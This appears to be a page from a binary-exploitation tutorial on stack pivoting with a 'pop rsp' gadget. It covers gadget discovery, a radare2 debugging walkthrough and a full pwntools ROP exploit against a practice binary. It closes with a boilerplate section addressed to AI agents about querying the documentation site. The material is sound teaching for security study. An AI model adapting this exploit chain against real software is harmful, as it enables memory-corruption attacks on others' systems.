# pop rsp ## Exploitation ### Gadgets FIrst off, let's grab all the gadgets. I'll use `ROPgadget` again to do so: ``` $ ROPgadget --binary vuln | grep 'pop rsp' 0x0000000000401225 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret $ ROPgadget --binary vuln | grep 'pop rdi' 0x000000000040122b : pop rdi ; ret $ ROPgadget --binary vuln | grep 'pop rsi' 0x0000000000401229 : pop rsi ; pop r15 ; ret ``` Now we have all the gadgets, let's chuck them into the script: ```python POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret POP_RDI = 0x40122b POP_RSI_R15 = 0x401229 ``` ### Testing the pop Let's just make sure the `pop` works by sending a basic chain and then breaking on `ret` and stepping through. ```python payload = flat( 'A' * 104, POP_CHAIN, buffer, 0, # r13 0, # r14 0 # r15 ) pause() p.sendline(payload) print(p.recvline()) ``` If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it off, attach r2. ``` $r2 -d -A $(pidof vuln) [0x7f96f01e9dee]> db 0x004011b8 [0x7f96f01e9dee]> dc hit breakpoint at: 4011b8 [0x004011b8]> pxq @ rsp 0x7ffce2d4fc68 0x0000000000401225 0x00007ffce2d4fc00 0x7ffce2d4fc78 0x0000000000000000 0x00007ffce2d4fd68 ``` You may see that only the gadget + 2 more values were written; this is because our buffer length is **limited**, and this is the reason we need to stack pivot. Let's step through the first `pop`. ``` [0x004011b8]> ds [0x00401225]> ds [0x00401226]> dr rsp 0x7ffce2d4fc00 ``` You may notice it's the same as our "leaked" value, so it's working. Now let's try and pop the `0x0` into `r13`. ``` [0x00401226]> ds [0x00401228]> dr r13 0x4141414141414141 ``` What? We passed in `0x0` to the gadget! Remember, however, that `pop r13` is equivalent to `mov r13, [rsp]` - the value from the top of the stack is moved into `r13`. **Because we moved RSP, the top of the stack moved to our buffer** and `AAAAAAAA` was popped into it - because that's what the top of the stack points to now. ### Full Payload Now we understand the intricasies of the pop, let's just finish the exploit off. To account for the additional `pop` calls, we have to put some junk at the **beginning** of the buffer, before we put in the ropchain. ```python payload = flat( 0, # r13 0, # r14 0, # r15 POP_RDI, 0xdeadbeef, POP_RSI_R15, 0xdeadc0de, 0x0, # r15 elf.sym['winner'] ) payload = payload.ljust(104, b'A') # pad to 104 payload += flat( POP_CHAIN, buffer # rsp - now stack points to our buffer! ) ``` ## Final Exploit ```python from pwn import * elf = context.binary = ELF('./vuln') p = process() p.recvuntil('to: ') buffer = int(p.recvline(), 16) log.success(f'Buffer: {hex(buffer)}') POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret POP_RDI = 0x40122b POP_RSI_R15 = 0x401229 payload = flat( 0, # r13 0, # r14 0, # r15 POP_RDI, 0xdeadbeef, POP_RSI_R15, 0xdeadc0de, 0x0, # r15 elf.sym['winner'] ) payload = payload.ljust(104, b'A') # pad to 104 payload += flat( POP_CHAIN, buffer # rsp ) pause() p.sendline(payload) print(p.recvline()) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ir0nstone.gitbook.io/notes/binexp/stack/stack-pivoting/exploitation/pop-rsp.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.